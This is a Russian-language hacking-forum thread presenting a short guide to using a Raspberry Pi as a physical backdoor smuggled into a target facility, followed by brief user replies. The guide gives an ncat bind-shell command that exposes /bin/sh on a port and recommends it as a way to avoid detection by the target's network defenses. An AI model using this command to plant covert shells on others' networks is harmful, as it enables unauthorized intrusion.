• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Raspberry Pi - Физический бэкдор, часть 1

Sergei webware

Sergei webware

Well-known member
07.02.2016
72
330
BIT
18
Данное руководство посвящено одной из техник использования вашего Pi. Небольшой размер делает это устройство идеальным для случаев, когда вам требуется проникнуть на объект. В то же время Raspberry Pi обладает возможностями среднего компьютера. Надеюсь, данное руководство поможет вам раскрыть весь потенциал Raspberry Pi и позволит применить свои навыки на практике. Я планирую сделать из него мини-серию в рамках цикла статей о Raspberry Pi. Итак, давайте загрузим нашу Pi.

Лаборатория злого гения

Я не могу не подчеркнуть, как важно быть готовым к любым препятствиям, возникающим на пути. Посему ваш арсенал должен состоять из:
  • Kali Linux
  • Ссылка скрыта от гостей
  • Творческого подхода
Конечно, в данный список можно ещё много чего внести, но эти пункты, по моему мнению, имеют решающее значение.

Ncat

Существуют и другие методы подключения к Raspberry Pi. Вы можете воспользоваться SSH или, если бы хотели получить графический интерфейс, установить VNC сервер, а затем подключиться к нему, получив полный контроль над Kali с графическим интерфейсом. Проблема этих двух методов в том, что они, по всей вероятности, были бы замечены сетевой защитой Корпорации Зла.
Нажмите, чтобы раскрыть...

Таким образом, ncat остаётся одним из самых эффективных способов подключения к вашему Pi. Но, перед организацией подключения, вам нужно убедиться, что ncat установлен как на самом Pi, так и на компьютере, с которого будет производиться удалённое управление. Полагаю, вы уже установили его на обе системы, так что приступим к подключению. Введите:
Код: 
nc -l -p(порт) -e /bin/sh

Если эта команда выполнится успешно, вы сможете подключиться к Pi со своей Kali Linux… или другой системы, который вы пользуетесь. Суть в том, что вы исполняете простую команду:
Код: 
nc (IP-адрес) (порт)

Если всё прошло удачно, примите мои поздравления. Теперь вы можете навести шороху. Вот некоторые из инструментов, которые могут для этого пригодиться:
Почти все такие инструменты поддерживают Kali Linux. Главное понять, чего вы хотите достичь и не забывать про творческий подход.

Заключение

Теперь, когда у нас есть доступ к Pi, пришла пора заняться взломом. Я не стану рассказывать о каждом из многочисленных инструментов, но ваши возможности практически безграничны. В ближайшем будущем, я планирую написать несколько руководств по взлому с помощью Pi и различных инструментов. Но сейчас я занят работой над несколькими проектами, так что, пожалуйста, запаситесь терпением. Как обычно, жду ваших комментариев и предложений.

Источник
Ссылка скрыта от гостей
 
  • Нравится
Реакции: Breed и _Eliot_
sosiskapi

sosiskapi

Green Team
28.12.2016
57
22
BIT
0
Помогите вспомнить статью про Распберри, с объяснением как подключиться к нему через браузер. Там использовалась прога с гитхаба толи gotty толи getty. Где ее найти .

Разул глаза и нашел. Всем спосибо помощь больше не требуеться.
 
Последнее редактирование:
G

Gl@balWar

Юзаю на данный момент Kali Linux ( основная система ). На PI3 Стоит rasppbian (или что то похожее). В системе нет "-e", как можно заменить?
 
sosiskapi

sosiskapi

Green Team
28.12.2016
57
22
BIT
0
Ой дайте сумничяю три версии. Raspberry Pi Zero W | Raspberry Pi 3 | Raspberry Pi Zero | Raspberry Pi 2 | Raspberry Pi A+ | Raspberry Pi B.
 
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ